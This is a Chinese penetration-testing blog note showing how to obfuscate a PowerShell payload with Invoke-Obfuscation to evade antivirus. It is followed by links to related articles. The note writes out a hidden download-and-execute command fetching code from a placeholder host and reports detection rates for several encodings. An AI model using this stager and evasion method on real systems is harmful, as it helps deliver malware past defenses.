【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】
0x01 项目地址
https://github.com/danielbohannon/Invoke-Obfuscation
0x02 用法
- 生成powershell:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"
- 下载并用powershell进入项目目录执行:
Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation
如果报错请先执行:Set-ExecutionPolicy Unrestricted
- 输入要混淆的PS:
set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'
(设置ps文件:set scriptpath C:\0_poweshell\msf-crow.ps1
)
- 输入
ENCODING
选择要编码的方式:
0x03 编码测试
1. ASCII
选择1:
输出:
out PowerShellCodeASCII.ps1
免杀与上线测试
- 360静态查杀:
- 360动态查杀:
- VT:5/58
2. Hex
undo
撤销上次命令:
编码并输出:
免杀与上线测试
360静态查杀:
360动态查杀:
VT:9/59
3. Octal
编码并输出:
免杀与上线测试
360静态查杀:
360动态查杀:
VT:7/58
不再赘述。。。
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】相关推荐
- 渗透测试入门24之渗透测试参考书、课程、工具、认证
白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...
- [在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转
[i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...
- 渗透测试工程师都需要什么工具呢?网络安全(一)
渗透测试是目前网络安全人士向往的工作之一.令人兴奋,含金量高,且对所有人敞开大门.无论你是准毕业生.在校生.信息安全从业人员,还是对渗透测试感兴趣的人群,只要专项能力过硬,就可以成为渗透测试工程师.那 ...
- web安全攻防渗透测试笔记
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
- web安全攻防渗透测试笔记 (信安一班 李静)
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
- 【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
目录 九头蛇hydra 使用方法 案例分析 暴破ssh登录密码 环境介绍 开始爆破 破解成功 测试登录 各种协议破解汇总 FTP协议破解 http协议破解 https协议破解 路由器破解 http-p ...
- python网络安全设计_专为渗透测试人员设计的 Python 工具大合集
如果你对漏洞挖掘.逆向工程分析或渗透测试感兴趣的话,我第一个要推荐给你的就是Python编程语言.Python不仅语法简单上手容易,而且它还有大量功能强大的库和程序可供我们使用.在这篇文章中,我们会给 ...
- 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
拓扑图 Windows系统散列值获取 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作. 抓 ...
- 渗透测试工程师都需要什么工具呢?网络安全(三)
网站渗透测试是现阶段网络安全工作人员期待工作中之一.激动人心,含金量高,且对所有人张开怀抱.无论你是准毕业生.在校生.网络安全从业人员,还是对网站渗透测试有兴趣的群,仅需关键能力过硬,就能变成网站渗透 ...
- 渗透测试-2022红队必备工具列表总结
2022红队必备工具列表总结 文章目录 2022红队必备工具列表总结 一.信息收集 二.漏洞扫描 三.网站管理 四.在线工具 一.信息收集 1.AppInfoScanner 一款适用于以HVV行动 ...
最新文章
- 获取oracle数据库war报告,Oracle 数据库开发及SQL基础实战
- 一文讲解图像插值算法原理!附Python实现
- 微软Silverlight 3正式版已经出炉
- 一个servlet跳到另一个servlet_另一个太阳下的天与地
- Unable to Open User Login File
- adb.exe可能被其他程序关闭_木工中央除尘设备系统正式运行的操作程序
- 完美的项目从完美的表开始
- /boot/grub/grub.conf文件详解
- node-inspector使用方法
- 设计模式系列-创建者模式
- C# WPF MVVM开发框架Caliburn.Micro 关于Conventions⑧
- git 合并冲突_GIT提交记录和Revert commit过程分析
- 1003. 检查替换后的词是否有效
- PhotoShop制作空心圆角矩形
- Javascript 笔记与总结(2-1)Javascript 与 DOM
- 理解Virtual方法。
- android同花顺布局,同花顺首发 Android平板电脑炒股高清版
- 小米摄像头上传云服务器,杜老师说群晖:小米云摄像头无法对接群晖存储解决方法...
- 胡小胖:微商创业必备的软件工具
- Expeditious Cubing(浮点数处理)
热门文章
- (附源码)小程序 校园二手交易平台 毕业设计 191637
- 屏幕录制软件有哪些?4款超好用录屏软件下载,强烈推荐
- 强化学习Q-learning简单理解
- JavaScript 学习-42.jQuery 提交表单 submit() 方法
- 【总结】学堂云慕课-如何写好科研论文
- 飞鼠溪·狼(flying squirrel creek)-- BleedingWolves
- 计算机组成原理-概述篇
- 【菜鸟学Java】1:Java语言简介
- 物流企业matlab效率,基于DEA原理的物流企业综合效率评价
- ES6/7 + Babel 编译器-郭永峰-专题视频课程